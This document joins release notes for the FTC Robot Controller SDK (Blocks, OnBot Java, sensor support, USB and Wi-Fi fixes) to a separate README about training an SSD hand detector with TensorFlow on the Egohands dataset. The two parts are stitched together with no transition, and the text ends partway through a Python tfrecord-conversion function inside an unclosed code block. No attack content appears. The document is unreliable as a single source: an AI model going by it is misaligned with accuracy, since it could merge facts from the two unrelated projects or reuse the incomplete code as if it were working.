Known issues: Android Studio: After updating to the new v3.3 Android Studio project folder, if you get error messages indicating "InvalidVirtualFileAccessException" then you might need to do a File -> Invalidate Caches / Restart to clear the error. OnBot Java: Sometimes when you push the build button to build all op modes, the RC returns an error message that the build failed. If you press the build button a second time, the build typically succeeds.

Version 3.2 (built on 17.08.02)
This version of the software introduces the "OnBot Java" Development Tool. Similar to the FTC Blocks Development Tool, the FTC OnBot Java Development Tool allows a user to create, edit and build op modes dynamically using only a JavaScript-enabled web browser. The OnBot Java Development Tool is an integrated development environment (IDE) that is served up by the Robot Controller. Op modes are created and edited using a JavaScript-enabled browser (Google Chrome is recommended). Op modes are saved on the Robot Controller Android device directly. The OnBot Java Development Tool provides a Java programming environment that does NOT need Android Studio.

Changes with version 3.2 include: Enhanced web-based development tools: Introduction of the OnBot Java Development Tool. Web-based programming and management features are "always on" (the user no longer needs to put the Robot Controller into programming mode). Web-based management interface (where the user can change the Robot Controller name and also easily download the Robot Controller log file). OnBot Java, Blocks and Management features are available from the web-based interface.

Blocks Programming Development Tool: Changed the "LynxI2cColorRangeSensor" block to a "REV Color/range sensor" block. Fixed the tooltip for the ColorSensor.isLightOn block. Added blocks for ColorSensor.getNormalizedColors and LynxI2cColorRangeSensor.getNormalizedColors.
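On the Java side, the getNormalizedColors call mentioned above corresponds roughly to this pattern; it is a hedged sketch, and the sensor name is illustrative:

```java
import com.qualcomm.robotcore.eventloop.opmode.LinearOpMode;
import com.qualcomm.robotcore.hardware.NormalizedColorSensor;
import com.qualcomm.robotcore.hardware.NormalizedRGBA;

public class ColorReadSketch extends LinearOpMode {  // hypothetical OpMode name
    @Override
    public void runOpMode() {
        NormalizedColorSensor colorSensor =
                hardwareMap.get(NormalizedColorSensor.class, "sensor_color");
        waitForStart();
        while (opModeIsActive()) {
            // Normalized channel values are floats scaled roughly to the range 0..1.
            NormalizedRGBA colors = colorSensor.getNormalizedColors();
            telemetry.addData("red", colors.red);
            telemetry.addData("green", colors.green);
            telemetry.addData("blue", colors.blue);
            telemetry.update();
        }
    }
}
```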
Added example op modes for the digital touch sensor and the REV Robotics Color Distance sensor. User-selectable color themes. Includes many minor enhancements and fixes (too numerous to list).

Known issues: The autocomplete function is incomplete and does not support the following (for now): access via the this keyword; access via the super keyword; members of the super class not overridden by the class; any methods provided in the current class; inner classes; casted objects; any objects coming from a parenthetically enclosed expression.

Version 3.10 (built on 17.05.09)
This version of the software provides support for the REV Robotics Expansion Hub. This version also includes improvements in the USB communication layer in an effort to enhance system resiliency. If you were using a 2.x version of the software previously, updating to version 3.1 requires that you also update your Driver Station software in addition to updating the Robot Controller software. Also note that in version 3.10 software, the setMaxSpeed and getMaxSpeed methods are no longer available (not deprecated; they have been removed from the SDK). Also note that the new 3.x software incorporates motor profiles that a user can select as he/she configures the robot.

Changes include: Blocks changes: Added VuforiaTrackableDefaultListener.getPose and Vuforia.trackPose blocks. Added optimized blocks support for Vuforia extended tracking. Added an atan2 block to the math category. Added a useCompetitionFieldTargetLocations parameter to the Vuforia.initialize block; if set to false, the target locations are placed at (0,0,0) with the target orientation as specified in the https://github.com/gearsincorg/FTCVuforiaDemo/blob/master/Robot_Navigation.java tutorial op mode. Incorporates additional improvements to the USB comm layer to improve system resiliency (to recover from a greater number of communication disruptions).

Additional Notes Regarding Version 3.00 (built on 17.04.13)
In addition to the release changes listed below (see the section labeled "Version 3.00 (built on 17.04.13)"), version 3.00 has the following important changes: Version 3.00 software uses a new version of the FTC Robocol (robot protocol). If you upgrade to v3.0 on the Robot Controller and/or Android Studio side, you must also upgrade the Driver Station software to match the new Robocol. Version 3.00 software removes the setMaxSpeed and getMaxSpeed methods from the DcMotor class. If you have an op mode that formerly used these methods, you will need to remove the references/calls to these methods. Instead, v3.0 provides the max speed information through the use of motor profiles that are selected by the user during robot configuration. Version 3.00 software currently does not have a mechanism to disable extra I2C sensors. We hope to re-introduce this function with a release in the near future.

Version 3.00 (built on 17.04.13)
*** Use this version of the software at YOUR OWN RISK!!! ***
This software is being released as an "alpha" version. Use this version at your own risk! This pre-release software contains SIGNIFICANT changes, including changes to the Wi-Fi Direct pairing mechanism, rewrites of the I2C sensor classes, changes to the USB/FTDI layer, and the introduction of support for the REV Robotics Expansion Hub and the REV Robotics color-range-light sensor. These changes were implemented to improve the reliability and resiliency of the FTC control system. Please note, however, that version 3.00 is considered "alpha" code.
This code is being released so that the FIRST community will have an opportunity to test the new REV Expansion Hub electronics module when it becomes available in May. The developers do not recommend using this code for critical applications (i.e., competition use). *** Use this version of the software at YOUR OWN RISK!!! ***

Changes include: Major rework of the sensor-related infrastructure, including rewriting the sensor classes to implement synchronous I2C communication. Fix to reset the Autonomous timer back to 30 seconds. Implementation of specific motor profiles for approved 12V motors (includes Tetrix, AndyMark, Matrix and REV models). Modest improvements to enhance Wi-Fi P2P pairing. Fixes a telemetry log addition race. Publishes all the sources (not just a select few). Includes Blocks programming improvements: addition of optimized Vuforia blocks; auto scrollbar on the projects and sounds pages; fixed a blocks paste bug; blocks execute after the while-opModeIsActive loop (to allow for cleanup before exiting the op mode); added a gyro integratedZValue block; fixes a bug with the projects page for the Firefox browser; added an IsSpeaking block to AndroidTextToSpeech. Implements support for the REV Robotics Expansion Hub. Implements support for the integral REV IMU (physically installed on I2C bus 0; uses the same Bosch BNO055 9-axis absolute orientation sensor as the Adafruit 9DOF absolute orientation sensor). Implements support for the REV color/range/light sensor. Provides support to update Expansion Hub firmware through the FTC SDK. Detects the REV firmware version and records it in the log file. Includes support for the REV Control Hub (note that the REV Control Hub is not yet approved for FTC use). Implements FTC Blocks programming support for the REV Expansion Hub and sensor hardware. Detects and alerts when an I2C device disconnects.

Version 2.62 (built on 17.01.07)
Added a null pointer check before calling modeToByte() in the finishModeSwitchIfNecessary method of the ModernRoboticsUsbDcMotorController class. Changes to enhance Modern Robotics USB protocol robustness.

Version 2.61 (released on 16.12.19)
Blocks Programming mode changes: Fix to correct an issue when an exception was thrown because an OpticalDistanceSensor object appears twice in the hardware map (the second time as a LightSensor).

Version 2.6 (released on 16.12.16)
Fixes for the Gyro class: Improved (decreased) sensor refresh latency. Fixes isCalibrating issues. Blocks Programming mode changes: Blocks now ignores a device in the configuration XML if the name is empty; other devices in the configuration work fine.

Version 2.5 (internal release on 16.12.13)
Blocks Programming mode changes: Added blocks support for AdafruitBNO055IMU. Added a Download Op Mode button to FtcBlocks.html. Added support for copying blocks in one OpMode and pasting them in another OpMode. The clipboard content is stored on the phone, so the programming mode server must be running. Modified the Utilities section of the toolbox. In Programming Mode, displays information about the active connections. Fixed the paste location when the workspace has been scrolled. Added blocks support for the Android Accelerometer. Fixed an issue where Blocks Upload Op Mode truncated the name at the first dot. Added blocks support for Android SoundPool. Added type safety to blocks for Acceleration. Added type safety to blocks for AdafruitBNO055IMU.Parameters. Added type safety to blocks for AnalogInput. Added type safety to blocks for AngularVelocity. Added type safety to blocks for Color. Added type safety to blocks for ColorSensor. Added type safety to blocks for CompassSensor.
Added type safety to blocks for CRServo. Added type safety to blocks for DigitalChannel. Added type safety to blocks for ElapsedTime. Added type safety to blocks for Gamepad. Added type safety to blocks for GyroSensor. Added type safety to blocks for IrSeekerSensor. Added type safety to blocks for LED. Added type safety to blocks for LightSensor. Added type safety to blocks for LinearOpMode. Added type safety to blocks for MagneticFlux. Added type safety to blocks for MatrixF. Added type safety to blocks for MrI2cCompassSensor. Added type safety to blocks for MrI2cRangeSensor. Added type safety to blocks for OpticalDistanceSensor. Added type safety to blocks for Orientation. Added type safety to blocks for Position. Added type safety to blocks for Quaternion. Added type safety to blocks for Servo. Added type safety to blocks for ServoController. Added type safety to blocks for Telemetry. Added type safety to blocks for Temperature. Added type safety to blocks for TouchSensor. Added type safety to blocks for UltrasonicSensor. Added type safety to blocks for VectorF. Added type safety to blocks for Velocity. Added type safety to blocks for VoltageSensor. Added type safety to blocks for VuforiaLocalizer.Parameters. Added type safety to blocks for VuforiaTrackable. Added type safety to blocks for VuforiaTrackables. Added type safety to blocks for enums in AdafruitBNO055IMU.Parameters. Added type safety to blocks for AndroidAccelerometer, AndroidGyroscope, AndroidOrientation, and AndroidTextToSpeech.

Version 2.4 (released on 16.11.13)
Fix to avoid crashing for nonexistent resources. Blocks Programming mode changes: Added blocks to support OpenGLMatrix, MatrixF, and VectorF. Added blocks to support AngleUnit, AxesOrder, AxesReference, CameraDirection, CameraMonitorFeedback, DistanceUnit, and TempUnit. Added blocks to support Acceleration. Added blocks to support LinearOpMode.getRuntime. Added blocks to support MagneticFlux and Position. Fixed typos. Made blocks for ElapsedTime more consistent with other objects. Added blocks to support Quaternion, Velocity, Orientation, AngularVelocity. Added blocks to support VuforiaTrackables, VuforiaTrackable, VuforiaLocalizer, VuforiaTrackableDefaultListener. Fixed a few blocks. Added type checking to new blocks. Updated to the latest Blockly. Added default variable blocks to navigation and matrix blocks. Fixed the toolbox entry for openGLMatrix_rotation_withAxesArgs. When a user downloads a Blocks-generated op mode, only the .blk file is downloaded. When a user uploads a Blocks-generated op mode (.blk file), the JavaScript code is auto-generated. Added DbgLog support. Added logging when a blocks file is read/written. Fixed a bug to properly render blocks even if devices are missing from the configuration file. Added support for additional characters (not just alphanumeric) in block file names (for download and upload). Added support for OpMode flavor ("Autonomous" or "TeleOp") and group. Changes to Samples to prevent tutorial issues. Incorporated suggested changes from public pull 216 ("Replace .. paths"). Removes servo glitches when the robot is stopped. If the user hits "Cancel" when editing a configuration file, clears the unsaved changes and reverts to the original unmodified configuration. Added log info to help diagnose why the Robot Controller app was terminated (for example, by the watchdog function). Added the ability to transfer logs from the controller. Fixed an inconsistency for AngularVelocity. Limits unbounded growth of telemetry data.
If the user does not call telemetry.update() for a LinearOpMode in a timely manner, data added for telemetry might get lost if the size limit is exceeded.

Version 2.35 (released on 16.10.06)
Blockly programming mode: Removed an unnecessary idle() call from blocks for new projects.

Version 2.30 (released on 16.10.05)
Blockly programming mode: Mechanism added to save Blockly op modes from the Programming Mode Server onto the local device. To avoid clutter, blocks are displayed in categorized folders. Added support for DigitalChannel. Added support for ModernRoboticsI2cCompassSensor. Added support for ModernRoboticsI2cRangeSensor. Added support for VoltageSensor. Added support for AnalogInput. Added support for AnalogOutput. Fix for the CompassSensor setMode block. Vuforia: Fix deadlock / make camera data available while Vuforia is running. Update to Vuforia 6.0.117 (recommended by Vuforia and Google to close a security loophole). Fix for the autonomous 30 second timer bug (where the timer was in effect, even though it appeared to have timed out). opModeIsActive changes to allow cleanup after an op mode is stopped (with an enforced 2 second safety timeout). Fix to avoid reading I2C twice. Updated sample Op Modes. Improved logging and fixed intermittent freezing. Added a digital I/O sample. Cleaned up device names in the sample op modes to be consistent with the Pushbot guide. Fix to allow use of the IrSeekerSensorV3.

Version 2.20 (released on 16.09.08)
Support for the Modern Robotics Compass Sensor. Support for the Modern Robotics Range Sensor. Revised device names for the Pushbot templates to match the names used in the Pushbot guide. Fixed a bug so that the IrSeekerSensorV3 device is accessible as IrSeekerSensor in the hardwareMap. Modified computer vision code to require an individual Vuforia license (per legal requirement from PTC). Minor fixes. Blockly enhancements: Support for Voltage Sensor. Support for Analog Input. Support for Analog Output. Support for Light Sensor. Support for Servo Controller.

Version 2.10 (released on 16.09.03)
Support for the Adafruit IMU. Improvements to the ModernRoboticsI2cGyro class: Block on reset of the z axis; isCalibrating() returns true while the gyro is calibrating. Updated the sample gyro program. Blockly enhancements: support for android.graphics.Color; added support for ElapsedTime; improved look and legibility of blocks; support for the compass sensor; support for the ultrasonic sensor; support for IrSeeker; support for LED; support for the color sensor; support for CRServo; prompt the user to configure the robot before using programming mode. Provides the ability to disable audio cues. Various bug fixes and improvements.

Version 2.00 (released on 16.08.19)
This is the new release for the upcoming 2016-2017 FIRST Tech Challenge Season. Channel change is enabled in the FTC Robot Controller app for Moto G 2nd and 3rd Gen phones. Users can now use annotations to register/disable their Op Modes. Changes in the Android SDK, JDK and build tool requirements (minsdk=19, java 1.7, build tools 23.0.3). Standardized units in analog input. Cleaned up code for the existing analog sensor classes. setChannelMode and getChannelMode were REMOVED from the DcMotorController class. This is important: we no longer set the motor modes through the motor controller. setMode and getMode were added to the DcMotor class. A ContinuousRotationServo class has been added to the FTC SDK. The Range.clip() method has been overloaded so it can support this operation for int, short and byte integers. Some changes have been made (new methods added) on how a user can access items from the hardware map (a sketch appears below).
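A sketch combining several of these Version 2.00 changes, written with later-SDK names for clarity (the device name is illustrative, and enum spellings have shifted slightly across SDK versions):

```java
import com.qualcomm.robotcore.eventloop.opmode.LinearOpMode;
import com.qualcomm.robotcore.hardware.DcMotor;

public class MotorModeSketch extends LinearOpMode {  // hypothetical OpMode name
    @Override
    public void runOpMode() {
        // Fetch the motor from the hardware map by its configured name.
        DcMotor leftDrive = hardwareMap.dcMotor.get("left_drive");
        // Motor modes are now set on the DcMotor itself, not the controller.
        leftDrive.setMode(DcMotor.RunMode.RUN_USING_ENCODER);
        waitForStart();
        leftDrive.setPower(0.5);
        while (opModeIsActive()) {
            idle();
        }
        leftDrive.setPower(0.0);
    }
}
```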
Users can now set the zero power behavior for a DC motor so that the motor will brake or float when power is zero. A prototype Blockly Programming Mode has been added to the FTC Robot Controller. Users can place the Robot Controller into this mode, and then use a device (such as a laptop) that has a JavaScript-enabled browser to write Blockly-based Op Modes directly onto the Robot Controller. Users can now configure the robot remotely through the FTC Driver Station app. The Android Studio project supports Android Studio 2.1.x and compile SDK Version 23 (Marshmallow). The Vuforia Computer Vision SDK is integrated into the FTC SDK; users can use sample vision targets to get localization information on a standard FTC field. The project structure has been reorganized so that there is now a TeamCode package that users can use to place their local/custom Op Modes into. An inspection function has been integrated into the FTC Robot Controller and Driver Station apps (Thanks Team HazMat… 9277 & 10650!). Audio cues have been incorporated into the FTC SDK. A swap mechanism was added to the FTC Robot Controller configuration activity. For example, if you have two motor controllers on a robot, and you misidentified them in your configuration file, you can use the Swap button to swap the devices within the configuration file (so you do not have to manually re-enter the configuration info for the two devices). A fix mechanism was added to allow the user to replace an electronic module easily. For example, suppose a servo controller dies on your robot. You replace the broken module with a new module, which has a different serial number from the original servo controller. You can use the Fix button to automatically reconfigure your configuration file to use the serial number of the new module. Improvements were made to fix resiliency and responsiveness of the system. For LinearOpMode the user now must call telemetry.update() to update the telemetry data on the driver station. This update() mechanism ensures that the driver station gets the updated data properly and at the same time. The Auto Configure function of the Robot Controller is now template based. If there is a commonly used robot configuration, a template can be created so that the Auto Configure mechanism can be used to quickly configure a robot of this type. The logic to detect a runaway op mode (in both the LinearOpMode and OpMode types) and to abort the run, then auto recover, has been improved/implemented. A fix has been incorporated so that Logitech F310 gamepad mappings will be correct for Marshmallow users.

Release 16.07.08
For the ftc_app project, the gradle files have been modified to support Android Studio 2.1.x.

Release 16.03.30
For the MIT App Inventor, the design blocks have new icons that better represent the function of each design component. Some changes were made to the shutdown logic to ensure the robust shutdown of some of our USB services. A change was made to LinearOpMode so as to allow a given instance to be executed more than once, which is required for the App Inventor. Javadoc improved/updated.

Release 16.03.09
Changes made to make the FTC SDK synchronous (a significant change!): waitOneFullHardwareCycle() and waitForNextHardwareCycle() are no longer needed and have been deprecated. runOpMode() (for a LinearOpMode) is now decoupled from the system's hardware read/write thread. loop() (for an OpMode) is now decoupled from the system's hardware read/write thread. Methods are synchronous.
For example, if you call setMode(DcMotorController.RunMode.RESET_ENCODERS) for a motor, the encoder is guaranteed to be reset when the method call is complete. For a legacy module (NXT compatible), the user no longer has to toggle between read and write modes when reading from or writing to a legacy device. Changes made to enhance reliability/robustness during ESD events. Changes made to make code thread safe. A debug keystore was added so that user-generated robot controller APKs will all use the same signed key (to avoid conflicts if a team has multiple developer laptops, for example). Firmware version information for Modern Robotics modules is now logged. Changes made to improve USB comm reliability and robustness. Added support for a voltage indicator for legacy (NXT-compatible) motor controllers. Changes made to provide auto-stop capabilities for op modes: a LinearOpMode class will stop when the statements in runOpMode() are complete; the user does not have to push the stop button on the driver station; if an op mode is stopped by the driver station, but there is a runaway/uninterruptible thread persisting, the app will log an error message and then force itself to crash to stop the runaway thread. Driver Station UI modified to display the lowest measured voltage below the current voltage (12V battery). Driver Station UI modified to have a color background for the current voltage (green=good, yellow=caution, red=danger, extremely low voltage). Javadoc improved (edits and additional classes). Added app build time to the About activity for the driver station and robot controller apps. Display local IP addresses on the Driver Station About activity. Added I2cDeviceSynchImpl. Added the I2cDeviceSync interface. Added seconds() and milliseconds() to ElapsedTime for clarity. Added getCallbackCount() to I2cDevice. Added the missing clearI2cPortActionFlag. Added code to create log messages while waiting for LinearOpMode shutdown. Fix so the Wifi Direct Config activity will no longer launch multiple times. Added the ability to specify an alternate I2C address in software for the Modern Robotics gyro.

Release 16.02.09
Improved the battery checker feature so that voltage values get refreshed regularly (every 250 msec) on the Driver Station (DS) user interface. Improved the software so that the Robot Controller (RC) is much more resilient and "self-healing" to USB disconnects: If the user attempts to start/restart the RC with one or more modules missing, it will display a warning but still start up. When running an op mode, if one or more modules gets disconnected, the RC and DS will display warnings, and the robot will keep on working in spite of the missing module(s). If a disconnected module gets physically reconnected, the RC will auto-detect the module and the user will regain control of the recently connected module. Warning messages are more helpful (they identify the type of module that's missing plus its USB serial number). Code changes to fix the null gamepad reference when users try to reference the gamepads in the init() portion of their op mode. NXT light sensor output is now properly scaled; note that teams might have to readjust their light threshold values in their op modes. On the DS user interface, the gamepad icon for a driver will disappear if the matching gamepad is disconnected or if that gamepad gets designated as a different driver. Robot Protocol (ROBOCOL) version number info is displayed in the About screen on the RC and DS apps. Incorporated a display filter on the pairing screen to filter out devices that don't use the "-" format.
This filter can be turned off to show all WiFi Direct devices. Updated text in License file. Fixed formatting error in OpticalDistanceSensor.toString(). Fixed issue with a blank (“”) device name that would disrupt WiFi Direct pairing. Made a change so that the WiFi info and battery info can be displayed more quickly on the DS upon connecting to the RC. Improved javadoc generation. Modified code to make it easier to support language localization in the future. Release 16.01.04 Updated compileSdkVersion for apps. Prevented WiFi from entering power-saving mode. Removed an unused import from the driver station. Corrected "Dead zone" joystick code. Fix for LED.getDeviceName() and .getConnectionInfo() returning null. Apps check for ROBOCOL_VERSION mismatch. Fix for off-by-one errors and short-size limitations in Telemetry data string sizing. User telemetry output is sorted. Added formatting variants to DbgLog and RobotLog APIs. Code modified to allow for a long list of op mode names. Changes to improve thread safety of RobocolDatagramSocket. Fix for the "missing hardware leaves robot controller disconnected from driver station" error. Fix for "fast tapping of Init/Start causes problems" (the toast is now only instantiated on the UI thread). Added some log statements for the thread life cycle. Moved gamepad reset logic inside of initActiveOpMode() for robustness. Changes made to mitigate the risk of race conditions on public methods. Changes to try to flag when a WiFi Direct name contains non-printable characters. Fix to correct a race condition between .run() and .close() in ReadWriteRunnableStandard. Updated the FTDI driver. Made the ReadWriteRunnableStandard interface public. Fixed off-by-one errors in the Command constructor. Moved specific hardware implementations into their own package. Moved specific gamepad implementations to the hardware library. Changed the LICENSE file to the new BSD version. Fixed a race condition when shutting down Modern Robotics USB devices. Methods in the ColorSensor classes have been synchronized. Corrected isBusy() status to reflect end of motion. Corrected the "back" button keycode. The notSupported() method of the GyroSensor class was changed to protected (it should not be public). Release 15.11.04.001 Added support for the Modern Robotics Gyro. The GyroSensor class now supports the MR Gyro Sensor. Users can access heading data (about the Z axis). Users can also access raw gyro data (X, Y, & Z axes). Example MRGyroTest.java op mode included. Improved error messages: more descriptive error messages for exceptions in user code. Updated DcMotor API. Enable read mode on a new address in setI2cAddress. Fix so that the driver station app resets the gamepads when switching op modes. USB-related code changes to make USB comm more responsive and to display more explicit error messages. Fix so that USB will recover properly if the USB bus returns garbage data. Fix for a USB initialization race condition. Better error reporting during FTDI open. More explicit messages during USB failures. Fixed a bug so that the USB device is closed if the event loop teardown method was not called. Fixed a timer UI issue. Fixed a duplicate name UI bug (Legacy Module configuration). Fixed a race condition in EventLoopManager. Fix to keep references stable when updating the gamepad. For legacy Matrix motor/servo controllers, removed the necessity of appending "Motor" and "Servo" to controller names. Updated the HT color sensor driver to use constants from the ModernRoboticsUsbLegacyModule class. Updated the MR color sensor driver to use constants from the ModernRoboticsUsbDeviceInterfaceModule class.
Correctly handle I2C address changes in all color sensors. Updated/cleaned up op modes. Updated comments in the LinearI2cAddressChange.java example op mode. Replaced the calls to "setChannelMode" with "setMode" (to match the new name of the DcMotor method). Removed the K9AutoTime.java op mode. Added the MRGyroTest.java op mode (demonstrates how to use the MR Gyro Sensor). Added the MRRGBExample.java op mode (demonstrates how to use the MR Color Sensor). Added the HTRGBExample.java op mode (demonstrates how to use the HT legacy color sensor). Added MatrixControllerDemo.java (demonstrates how to use the legacy Matrix controller). Updated javadoc documentation. Updated release .apk files for the Robot Controller and Driver Station apps. Release 15.10.06.002 Added support for the Legacy Matrix 9.6V motor/servo controller. Cleaned up the build.gradle file. Minor UI and bug fixes for the driver station and robot controller apps. Throws an error if the Ultrasonic sensor (NXT) is not configured for legacy module port 4 or 5. Release 15.08.03.001 New user interfaces for the FTC Driver Station and FTC Robot Controller apps. An init() method is added to the OpMode class. For this release, init() is triggered right before the start() method. Eventually, the init() method will be triggered when the user presses an "INIT" button on the driver station. The init() and loop() methods are now required (i.e., they need to be overridden in the user's op mode). The start() and stop() methods are optional. A new LinearOpMode class is introduced. Teams can use LinearOpMode to create a linear (not event-driven) program model. Teams can use blocking statements like Thread.sleep() within a linear op mode. The APIs for the Legacy Module and Core Device Interface Module have been updated. Support for encoders with the Legacy Module is now working. The hardware loop has been updated for better performance.
molyswu / Hand Detectionusing Neural Networks (SSD) on Tensorflow. This repo documents steps and scripts used to train a hand detector using Tensorflow (Object Detection API). As with any DNN-based task, the most expensive (and riskiest) part of the process has to do with finding or creating the right (annotated) dataset. I was interested mainly in detecting hands on a table (egocentric viewpoint). I experimented first with the [Oxford Hands Dataset](http://www.robots.ox.ac.uk/~vgg/data/hands/) (the results were not good). I then tried the [Egohands Dataset](http://vision.soic.indiana.edu/projects/egohands/), which was a much better fit for my requirements. The goal of this repo/post is to demonstrate how neural networks can be applied to the (hard) problem of tracking hands (egocentric and other views) and, better still, to provide code that can be adapted to other use cases. If you use this tutorial or models in your research or project, please cite [this](#citing-this-tutorial). Here is the detector in action. <img src="images/hand1.gif" width="33.3%"><img src="images/hand2.gif" width="33.3%"><img src="images/hand3.gif" width="33.3%"> Realtime detection on a video stream from a webcam. <img src="images/chess1.gif" width="33.3%"><img src="images/chess2.gif" width="33.3%"><img src="images/chess3.gif" width="33.3%"> Detection on a YouTube video. Both examples above were run on a Macbook Pro **CPU** (i7, 2.5GHz, 16GB). Some fps numbers are:
| FPS | Image Size | Device | Comments |
| ------------- | ------------- | ------------- | ------------- |
| 21 | 320 * 240 | Macbook Pro (i7, 2.5GHz, 16GB) | Run without visualizing results |
| 16 | 320 * 240 | Macbook Pro (i7, 2.5GHz, 16GB) | Run while visualizing results (image above) |
| 11 | 640 * 480 | Macbook Pro (i7, 2.5GHz, 16GB) | Run while visualizing results (image above) |
> Note: The code in this repo is written and tested with Tensorflow `1.4.0-rc0`. Using a different version may result in [some errors](https://github.com/tensorflow/models/issues/1581). You may need to [generate your own frozen model](https://pythonprogramming.net/testing-custom-object-detector-tensorflow-object-detection-api-tutorial/?completed=/training-custom-objects-tensorflow-object-detection-api-tutorial/) graph using the [model checkpoints](model-checkpoint) in the repo to fit your TF version. **Content of this document** - Motivation - Why Track/Detect hands with Neural Networks - Data preparation and network training in Tensorflow (Dataset, Import, Training) - Training the hand detection Model - Using the Detector to Detect/Track hands - Thoughts on Optimizations. > P.S. If you are using or have used the models provided here, feel free to reach out on twitter ([@vykthur](https://twitter.com/vykthur)) and share your work! ## Motivation - Why Track/Detect hands with Neural Networks? There are several existing approaches to tracking hands in the computer vision domain. Incidentally, many of these approaches are rule-based (e.g., extracting the background based on texture and boundary features, or distinguishing between hands and background using color histograms and HOG classifiers), making them not very robust.
For example, these algorithms might get confused if the background is unusual, or in situations where sharp changes in lighting conditions cause sharp changes in skin color, or where the tracked object becomes occluded (see [this review paper](https://www.cse.unr.edu/~bebis/handposerev.pdf) on hand pose estimation from the HCI perspective). With sufficiently large datasets, neural networks provide the opportunity to train models that perform well and address the challenges of existing object tracking/detection algorithms - varied/poor lighting, noisy environments, diverse viewpoints and even occlusion. The main drawbacks to using them for real-time tracking/detection are that they can be complex, are relatively slow compared to tracking-only algorithms, and it can be quite expensive to assemble a good dataset. But things are changing with advances in fast neural networks. Furthermore, this entire area of work has been made more approachable by deep learning frameworks (such as the tensorflow object detection api) that simplify the process of training a model for custom object detection. More importantly, the advent of fast neural network models like SSD, Faster R-CNN and R-FCN (see [here](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/detection_model_zoo.md#coco-trained-models-coco-models)) makes neural networks an attractive candidate for real-time detection (and tracking) applications. Hopefully, this repo demonstrates this. > If you are not interested in the process of training the detector, you can skip straight to applying the [pretrained model I provide in detecting hands](#detecting-hands). Training a model is a multi-stage process (assembling the dataset, cleaning, splitting into training/test partitions and generating an inference graph). While I lightly touch on the details of these parts, a few other tutorials cover training a custom object detector using the tensorflow object detection api in more detail [see [here](https://pythonprogramming.net/training-custom-objects-tensorflow-object-detection-api-tutorial/) and [here](https://towardsdatascience.com/how-to-train-your-own-object-detector-with-tensorflows-object-detector-api-bec72ecfe1d9)]. I recommend you walk through those if you are interested in training a custom object detector from scratch. ## Data preparation and network training in Tensorflow (Dataset, Import, Training) **The Egohands Dataset** The hand detector model is built using data from the [Egohands Dataset](http://vision.soic.indiana.edu/projects/egohands/). This dataset works well for several reasons. It contains high quality, pixel level annotations (>15000 ground truth labels) where hands are located across 4800 images. All images are captured from an egocentric view (Google glass) across 48 different environments (indoor, outdoor) and activities (playing cards, chess, jenga, solving puzzles etc). <img src="images/egohandstrain.jpg" width="100%"> If you will be using the Egohands dataset, you can cite them as follows: > Bambach, Sven, et al. "Lending a hand: Detecting hands and recognizing activities in complex egocentric interactions." Proceedings of the IEEE International Conference on Computer Vision. 2015. The Egohands dataset (zip file with labelled data) contains 48 folders of locations where video data was collected (100 images per folder).
```
-- LOCATION_X
   -- frame_1.jpg
   -- frame_2.jpg
   ...
   -- frame_100.jpg
   -- polygons.mat  // contains annotations for all 100 images in current folder
-- LOCATION_Y
   -- frame_1.jpg
   -- frame_2.jpg
   ...
   -- frame_100.jpg
   -- polygons.mat  // contains annotations for all 100 images in current folder
```
**Converting data to Tensorflow Format** Some initial work needs to be done to the Egohands dataset to transform it into the format (`tfrecord`) which Tensorflow needs to train a model. This repo contains `egohands_dataset_clean.py`, a script that will help you generate these csv files. It: - Downloads the egohands datasets - Renames all files to include their directory names to ensure each filename is unique - Splits the dataset into train (80%), test (10%) and eval (10%) folders - Reads in `polygons.mat` for each folder, generates bounding boxes and visualizes them to ensure correctness (see image above). Once the script is done running, you should have an images folder containing three folders - train, test and eval. Each of these folders should also contain a csv label file - `train_labels.csv`, `test_labels.csv` - that can be used to generate `tfrecords`. Note: While the egohands dataset provides four separate labels for hands (own left, own right, other left, and other right), for my purpose I am only interested in the general `hand` class, so I label all training data as `hand`. You can modify the data prep script to generate `tfrecords` that support 4 labels. Next: convert your dataset + csv files to tfrecords. A helpful guide on this can be found [here](https://pythonprogramming.net/creating-tfrecord-files-tensorflow-object-detection-api-tutorial/). For each folder, you should be able to generate the `train.record` and `test.record` files required in the training process (a minimal sketch of this conversion step is shown below). ## Training the hand detection Model Now that the dataset has been assembled (and your tfrecords), the next task is to train a model based on this. With neural networks, it is possible to use a process called [transfer learning](https://www.tensorflow.org/tutorials/image_retraining) to shorten the amount of time needed to train the entire model. This means we can take an existing model that has been trained well on a related domain (here, image classification) and retrain its final layer(s) to detect hands for us. Sweet! Given that neural networks sometimes have thousands or millions of parameters that can take weeks or months to train, transfer learning helps shorten training time to possibly hours. Tensorflow does offer a few models (in the tensorflow [model zoo](https://github.com/tensorflow/models/blob/master/research/object_detection/g3doc/detection_model_zoo.md#coco-trained-models-coco-models)) and I chose to use the `ssd_mobilenet_v1_coco` model as my starting point, given that it is currently (one of) the fastest models (read the SSD research [paper here](https://arxiv.org/pdf/1512.02325.pdf)). The training process can be done locally on your CPU machine, which may take a while, or better on a (cloud) GPU machine (which is what I did). For reference, training on my Macbook Pro (with tensorflow compiled from source to take advantage of the mac's cpu architecture), the best speed I got was 5 seconds per step, as opposed to the ~0.5 seconds per step I got with a GPU. At that rate it would take about 12 days to run 200k steps on my mac (i7, 2.5GHz, 16GB), compared to ~5hrs on a GPU.
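Here is a minimal sketch of the csv-to-`tfrecord` conversion step mentioned above, written against the TF 1.x API this repo targets. The helper name and CSV fields are illustrative assumptions, not this repo's exact code; the pythonprogramming guide linked above walks through the full version.
```python
import tensorflow as tf

def create_tf_example(row, encoded_jpg, width, height):
    # row holds (filename, xmin, ymin, xmax, ymax, class) from e.g. train_labels.csv;
    # box coordinates are normalized to [0, 1] as the Object Detection API expects.
    feature = {
        'image/encoded': tf.train.Feature(bytes_list=tf.train.BytesList(value=[encoded_jpg])),
        'image/format': tf.train.Feature(bytes_list=tf.train.BytesList(value=[b'jpeg'])),
        'image/width': tf.train.Feature(int64_list=tf.train.Int64List(value=[width])),
        'image/height': tf.train.Feature(int64_list=tf.train.Int64List(value=[height])),
        'image/object/bbox/xmin': tf.train.Feature(float_list=tf.train.FloatList(value=[row['xmin'] / width])),
        'image/object/bbox/xmax': tf.train.Feature(float_list=tf.train.FloatList(value=[row['xmax'] / width])),
        'image/object/bbox/ymin': tf.train.Feature(float_list=tf.train.FloatList(value=[row['ymin'] / height])),
        'image/object/bbox/ymax': tf.train.Feature(float_list=tf.train.FloatList(value=[row['ymax'] / height])),
        'image/object/class/text': tf.train.Feature(bytes_list=tf.train.BytesList(value=[b'hand'])),
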